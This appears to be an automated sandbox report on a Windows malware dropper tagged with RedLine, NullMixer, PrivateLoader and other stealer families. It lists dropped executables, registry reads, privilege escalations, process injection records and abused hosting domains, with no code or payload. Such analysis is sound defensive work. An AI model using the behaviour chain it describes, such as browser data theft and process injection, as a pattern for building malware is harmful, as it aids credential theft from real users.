Malware Analysis Report

2025-01-02 06:02

Sample ID 241123-xbw7rszqbt
Target e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe
SHA256 e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef

Threat Level: Known bad

The file e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe was found to be: Known bad.

Malicious Activity Summary

fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer

Nullmixer family

Fabookie

Fabookie family

Socelars

RedLine payload

PrivateLoader

Redline family

Detect Fabookie payload

NullMixer

Onlylogger family

Gcleaner family

Socelars payload

Socelars family

GCleaner

OnlyLogger

RedLine

Privateloader family

OnlyLogger payload

Command and Scripting Interpreter: PowerShell

ASPack v2.12-2.42

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Blocklisted process makes network request

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Looks up geolocation information via web service

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Browser Information Discovery

Program crash

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-23 18:41

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-23 18:41

Reported

2024-11-23 18:43

Platform

win7-20241010-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14f1396dfcf191bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14d32a38896785b13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14514904a4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2188 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
